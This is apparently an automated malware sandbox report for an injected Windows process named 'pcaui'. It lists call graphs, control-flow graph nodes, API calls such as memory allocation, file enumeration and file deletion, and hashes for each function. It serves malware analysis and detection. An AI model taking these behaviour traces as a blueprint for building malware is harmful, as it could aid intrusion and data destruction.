NtAllocateVirtualMemory 101089->101090 101091 2d83da1 101090->101091 101092 2d83eae 101091->101092 101093 2d748c0 LdrLoadDll 101091->101093 101092->101088 101095 2d83de7 101093->101095 101094 2d83e30 Sleep 101094->101095 101095->101092 101095->101094 101097 2d7fb60 101098 2d7fbc4 101097->101098 101126 2d76620 101098->101126 101100 2d7fcfe 101101 2d7fcf7 101101->101100 101133 2d76730 101101->101133 101103 2d7fea3 101104 2d7fd7a 101104->101103 101105 2d7feb2 101104->101105 101137 2d7f940 101104->101137 101106 2d897d0 NtClose 101105->101106 101108 2d7febc 101106->101108 101109 2d7fdb6 101109->101105 101110 2d7fdc1 101109->101110 101111 2d8b990 RtlAllocateHeap 101110->101111 101112 2d7fdea 101111->101112 101113 2d7fdf3 101112->101113 101114 2d7fe09 101112->101114 101116 2d897d0 NtClose 101113->101116 101146 2d7f830 CoInitialize 101114->101146 101117 2d7fdfd 101116->101117 101118 2d7fe17 101149 2d89290 101118->101149 101120 2d7fe92 101121 2d897d0 NtClose 101120->101121 101122 2d7fe9c 101121->101122 101123 2d8b8b0 RtlFreeHeap 101122->101123 101123->101103 101124 2d7fe35 101124->101120 101125 2d89290 LdrInitializeThunk 101124->101125 101125->101124 101127 2d76653 101126->101127 101128 2d76674 101127->101128 101153 2d89330 101127->101153 101128->101101 101130 2d76697 101130->101128 101131 2d897d0 NtClose 101130->101131 101132 2d76717 101131->101132 101132->101101 101134 2d76755 101133->101134 101158 2d89120 101134->101158 101138 2d7f95c 101137->101138 101139 2d748c0 LdrLoadDll 101138->101139 101141 2d7f97a 101139->101141 101140 2d7f983 101140->101109 101141->101140 101142 2d748c0 LdrLoadDll 101141->101142 101143 2d7fa4e 101142->101143 101144 2d748c0 LdrLoadDll 101143->101144 101145 2d7faa8 101143->101145 101144->101145 101145->101109 101148 2d7f895 101146->101148 101147 2d7f92b CoUninitialize 101147->101118 101148->101147 101150 2d892aa 101149->101150 101163 5002ba0 LdrInitializeThunk 101150->101163 101151 2d892da 101151->101124 101154 2d8934a 101153->101154 101157 5002ca0 LdrInitializeThunk 101154->101157 101155 2d89376 101155->101130 101157->101155 101159 2d8913a 101158->101159 101162 5002c60 LdrInitializeThunk 101159->101162 101160 2d767c9 101160->101104 101162->101160 101163->101151 101164 2d7c920 101166 2d7c949 101164->101166 101165 2d7ca4d 101166->101165 101167 2d7c9f3 FindFirstFileW 101166->101167 101167->101165 101169 2d7ca0e 101167->101169 101168 2d7ca34 FindNextFileW 101168->101169 101170 2d7ca46 FindClose 101168->101170 101169->101168 101170->101165 101171 2d81a60 101172 2d81a7c 101171->101172 101173 2d81ab8 101172->101173 101174 2d81aa4 101172->101174 101176 2d897d0 NtClose 101173->101176 101175 2d897d0 NtClose 101174->101175 101177 2d81aad 101175->101177 101178 2d81ac1 101176->101178 101181 2d8b9d0 RtlAllocateHeap 101178->101181 101180 2d81acc 101181->101180 101182 2d80420 101183 2d8043d 101182->101183 101184 2d748c0 LdrLoadDll 101183->101184 101185 2d8045b 101184->101185 101186 2d79f6f 101187 2d79f7f 101186->101187 101188 2d8b8b0 RtlFreeHeap 101187->101188 101189 2d79f86 101187->101189 101188->101189 101190 2d89720 101191 2d8979a 101190->101191 101193 2d8974e 101190->101193 101192 2d897b0 NtDeleteFile 101191->101192 101194 2d72ae8 101195 2d72b08 101194->101195 101196 2d76620 2 API calls 101195->101196 101197 2d72b13 101196->101197

                                                                                                                        Executed Functions

                                                                                                                        Function 02D69E10 Relevance: 36.7, Strings: 29, Instructions: 451COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 26 2d69e10-2d6a216 27 2d6a227-2d6a233 26->27 28 2d6a235-2d6a241 27->28 29 2d6a243-2d6a24d 27->29 28->27 31 2d6a25e-2d6a26a 29->31 32 2d6a26c-2d6a276 31->32 33 2d6a278-2d6a282 31->33 32->31 35 2d6a293-2d6a29f 33->35 36 2d6a2b2-2d6a2bc 35->36 37 2d6a2a1-2d6a2b0 35->37 39 2d6a2cd-2d6a2d9 36->39 37->35 40 2d6a2f0 39->40 41 2d6a2db-2d6a2ee 39->41 42 2d6a2f7-2d6a301 40->42 41->39 44 2d6a303-2d6a31e 42->44 45 2d6a33a-2d6a341 42->45 46 2d6a325-2d6a327 44->46 47 2d6a320-2d6a324 44->47 48 2d6a366-2d6a37f 45->48 49 2d6a343-2d6a359 45->49 50 2d6a338 46->50 51 2d6a329-2d6a332 46->51 47->46 48->48 54 2d6a381-2d6a38b 48->54 52 2d6a364 49->52 53 2d6a35b-2d6a361 49->53 50->42 51->50 52->45 53->52 55 2d6a39c-2d6a3a5 54->55 56 2d6a3a7-2d6a3ba 55->56 57 2d6a3bc-2d6a3c0 55->57 56->55 58 2d6a3c2-2d6a3df 57->58 59 2d6a3e1-2d6a3eb 57->59 58->57 61 2d6a3fc-2d6a405 59->61 62 2d6a407-2d6a419 61->62 63 2d6a41b-2d6a42c 61->63 62->61 65 2d6a43d-2d6a446 63->65 66 2d6a45a 65->66 67 2d6a448-2d6a458 65->67 69 2d6a461-2d6a465 66->69 67->65 70 2d6a467-2d6a48c 69->70 71 2d6a48e-2d6a498 69->71 70->69 72 2d6a4a9-2d6a4b3 71->72 73 2d6a4b5-2d6a4c8 72->73 74 2d6a4ca-2d6a4da 72->74 73->72 74->74 75 2d6a4dc-2d6a4e5 74->75 77 2d6a693-2d6a6ac 75->77 78 2d6a4eb-2d6a4f5 75->78 77->77 80 2d6a6ae-2d6a6b8 77->80 79 2d6a506-2d6a50f 78->79 81 2d6a522-2d6a535 79->81 82 2d6a511-2d6a520 79->82 83 2d6a6c9-2d6a6d2 80->83 84 2d6a546-2d6a552 81->84 82->79 86 2d6a6d4-2d6a6e1 83->86 87 2d6a6e3-2d6a6ea 83->87 91 2d6a554-2d6a566 84->91 92 2d6a568-2d6a572 84->92 86->83 88 2d6a711-2d6a71b 87->88 89 2d6a6ec-2d6a70f 87->89 93 2d6a72c-2d6a735 88->93 89->87 91->84 94 2d6a583-2d6a58f 92->94 96 2d6a737-2d6a749 93->96 97 2d6a74b-2d6a752 93->97 98 2d6a5a5-2d6a5ac 94->98 99 2d6a591-2d6a5a3 94->99 96->93 100 2d6a754-2d6a75e 97->100 101 2d6a790-2d6a79a 97->101 103 2d6a5e3-2d6a5f2 98->103 104 2d6a5ae-2d6a5e1 98->104 99->94 108 2d6a76f-2d6a77b 100->108 106 2d6a5f4-2d6a5fe 103->106 107 2d6a64b-2d6a651 103->107 104->98 109 2d6a60f-2d6a61b 106->109 110 2d6a655-2d6a65c 107->110 111 2d6a77d-2d6a789 108->111 112 2d6a78b call 2d8b520 108->112 113 2d6a62c-2d6a647 109->113 114 2d6a61d-2d6a62a 109->114 115 2d6a68e 110->115 116 2d6a65e-2d6a68c 110->116 117 2d6a760-2d6a769 111->117 112->101 113->113 120 2d6a649 113->120 114->109 115->75 116->110 117->108 120->77
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: &Z$)#$0a$66$=]$A$C$LF$MW$Py$X,$[$]s$_n`3$`3$a)$ao$gn$m$nK$nv$s:$t$t?$td$tn$w($G$|
                                                                                                                        • API String ID: 0-31118547
                                                                                                                        • Opcode ID: bf978f7149bf0498172532c11720008597b6518bd44c95df12adbe04920d50a4
                                                                                                                        • Instruction ID: 4ef6aab2d6fb5006114b28aed6025ff35fefb8c1aa0324bf6349264377830d23
                                                                                                                        • Opcode Fuzzy Hash: bf978f7149bf0498172532c11720008597b6518bd44c95df12adbe04920d50a4
                                                                                                                        • Instruction Fuzzy Hash: C9427DB0D052698BEB24CF84C9987EDBBB1BB45308F1481DAC5897B380D7B96E84CF55
                                                                                                                        Function 02D7C920 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02D7CA04
                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02D7CA3F
                                                                                                                        • FindClose.KERNELBASE(?), ref: 02D7CA4A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
                                                                                                                        • Opcode ID: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                                                        • Instruction ID: 02b1161424b571659966f7bdbc27c7297db78d85bf6c4d553eea74984a6dd75a
                                                                                                                        • Opcode Fuzzy Hash: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                                                        • Instruction Fuzzy Hash: DF316071A10308BBDB20EBA4CC85FFE777DDB45745F14459AB509A7280EB74AE848BA0
                                                                                                                        Function 02D894C0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02D895BE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                                                        • Instruction ID: b2074b490aca5c65d4a0fcd7b80bf2520392021b89a65003df0d2d5ff48957b7
                                                                                                                        • Opcode Fuzzy Hash: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                                                        • Instruction Fuzzy Hash: E031A1B5A15209AFCB04DF98D881EEFB7B9EF8C714F108219F919A7340D730A951CBA5
                                                                                                                        Function 02D89630 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02D89716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                                                        • Instruction ID: be655213dbc2319d09b34abb3730532347e7d38a2090f217b81529a9e336473e
                                                                                                                        • Opcode Fuzzy Hash: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                                                        • Instruction Fuzzy Hash: 5F3197B5A00209ABDB14DF98D881EEEB7B9EB8C714F108219F919A7340D774A911CBA5
                                                                                                                        Function 02D89940 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(02D720FE,?,02D882AE,00000000,00000004,00003000,?,?,?,?,?,02D882AE,02D720FE,02D882AE,00000000), ref: 02D89A0B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                                                        • Instruction ID: d2b651df3535a550b4a04005572f381e39c6d10d3f167ea068aa08be6124188e
                                                                                                                        • Opcode Fuzzy Hash: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                                                        • Instruction Fuzzy Hash: D02128B5A00209AFDB14EF98D881EEFB7B9EF88700F10410AFD59A7340D770A911CBA5
                                                                                                                        Function 02D89720 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                                                        • Instruction ID: 5e6f6f8c1915c4aef10635da6883145f15014e31ff4ce772ee9215287eefe3ce
                                                                                                                        • Opcode Fuzzy Hash: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                                                        • Instruction Fuzzy Hash: 8311AC71600608BBD620FBA8DC41FEBB7ADEF85714F00850AF949A7380D7707A018BB5
                                                                                                                        Function 02D897D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02D89807
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                                                        • Instruction ID: b3ce86e3ce0fc93e524829747c8fa4bbb43678ea3a991f6b42766e3714c948bf
                                                                                                                        • Opcode Fuzzy Hash: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                                                        • Instruction Fuzzy Hash: 51E046362002047BD220BB99DC41FEB77ADDBC5714F008419FA0CAB381C671B9118BF0
                                                                                                                        Function 05004650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b9f0f4d06115c67e49f51c5b5044230bcb79ddf0fdc6168a1d0332630c46ca4b
                                                                                                                        • Instruction ID: a9f8462a27853ce9b93cd49de0a1c5d35021804858f96f1d154197efe8cd4aca
                                                                                                                        • Opcode Fuzzy Hash: b9f0f4d06115c67e49f51c5b5044230bcb79ddf0fdc6168a1d0332630c46ca4b
                                                                                                                        • Instruction Fuzzy Hash: 959002626415004351407158984440A70159BE23013D5C115A4554560C87188A55936E
                                                                                                                        Function 05004340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: f0cdba3048a7d0c9357717d3fcf2e98eacf16b29033847b3497304767be0aff0
                                                                                                                        • Instruction ID: a5e6588986b99ab8e0e811b6f41de69427b5af544946e6408be61ad62300b98e
                                                                                                                        • Opcode Fuzzy Hash: f0cdba3048a7d0c9357717d3fcf2e98eacf16b29033847b3497304767be0aff0
                                                                                                                        • Instruction Fuzzy Hash: 8490023264580013A140715898C454A50159BE1301BD5C011E4424554C8B148B565366
                                                                                                                        Function 05002D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fb396487db7915fde63357d0b62c771759a58e1d01d1b65bb3d69bbf82f0d225
                                                                                                                        • Instruction ID: 4377d4fe33df93bf601973c6785a0ee6491bef32a569cc442cea7bbf85a74470
                                                                                                                        • Opcode Fuzzy Hash: fb396487db7915fde63357d0b62c771759a58e1d01d1b65bb3d69bbf82f0d225
                                                                                                                        • Instruction Fuzzy Hash: C290022A25340003E1807158A44860E10158BD2202FD5D415A4015558CCA158A695326
                                                                                                                        Function 05002D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8c171b3081794da22b112e1dab20d7c2978df39e771187124d4194a9ba06b62f
                                                                                                                        • Instruction ID: ac5c842713f44c42f701d46b6b66303a9ba905090b5c75a1ae6fdc29f9e1bba2
                                                                                                                        • Opcode Fuzzy Hash: 8c171b3081794da22b112e1dab20d7c2978df39e771187124d4194a9ba06b62f
                                                                                                                        • Instruction Fuzzy Hash: C490022234140003E1407158A45860A5015DBE2301FD5D011E4414554CDA158A565327
                                                                                                                        Function 05002DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: f4775a4e9df6b719b2909d6762cfb8f2841d4aba82ecbd46709b7c27ba75edc3
                                                                                                                        • Instruction ID: ed16303aa8645dfa022f1ab70e9ad4f480baca8f11d30828e99f9a3b2e32ede7
                                                                                                                        • Opcode Fuzzy Hash: f4775a4e9df6b719b2909d6762cfb8f2841d4aba82ecbd46709b7c27ba75edc3
                                                                                                                        • Instruction Fuzzy Hash: 77900222282441536545B158944450B50169BE12417D5C012A5414950C86269A56D726
                                                                                                                        Function 05002DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8059939a337fc575519dd83b8a769396f8d29ba4386e43031f0321f40ebaec44
                                                                                                                        • Instruction ID: c0b16dd4fa2375a8c10df64e689fcb13689e6a357ab20fb750ae7a5fc1731957
                                                                                                                        • Opcode Fuzzy Hash: 8059939a337fc575519dd83b8a769396f8d29ba4386e43031f0321f40ebaec44
                                                                                                                        • Instruction Fuzzy Hash: C190023224140413E1117158954470B10198BD1241FD5C412A4424558D97568B52A226
                                                                                                                        Function 05002C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 2140d860a56c6806967843a061f7323411ba2d0719c76343bcf1a36c73329311
                                                                                                                        • Instruction ID: 74240fcb84b195c7c9300a33b89133d0207258d8272813a42083449b99a5cb40
                                                                                                                        • Opcode Fuzzy Hash: 2140d860a56c6806967843a061f7323411ba2d0719c76343bcf1a36c73329311
                                                                                                                        • Instruction Fuzzy Hash: C190023224140843E10071589444B4A10158BE1301FD5C016A4124654D8715CA517626
                                                                                                                        Function 05002C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d8f13ecdf74593c7366d2de3986f4b9aabfd5feb624f4436702682e8b21487aa
                                                                                                                        • Instruction ID: a2d8b8d659acb2a8778ad5656eb9522c5b3871c5b5627f933c0878049bf8eaa9
                                                                                                                        • Opcode Fuzzy Hash: d8f13ecdf74593c7366d2de3986f4b9aabfd5feb624f4436702682e8b21487aa
                                                                                                                        • Instruction Fuzzy Hash: 3F90023224148803E1107158D44474E10158BD1301FD9C411A8424658D87958A917226
                                                                                                                        Function 05002CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 9ed1022b60a2bc7c60bc0de11759ce011507777fe90729052c5ddfd15dc3ddac
                                                                                                                        • Instruction ID: 679b4fa1a5aa81c5e9d4a81577672846f68d563cbe1ded18008f01cda5679df1
                                                                                                                        • Opcode Fuzzy Hash: 9ed1022b60a2bc7c60bc0de11759ce011507777fe90729052c5ddfd15dc3ddac
                                                                                                                        • Instruction Fuzzy Hash: C690023224140403E1007598A44864A10158BE1301FD5D011A9024555EC7658A916236
                                                                                                                        Function 05002F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
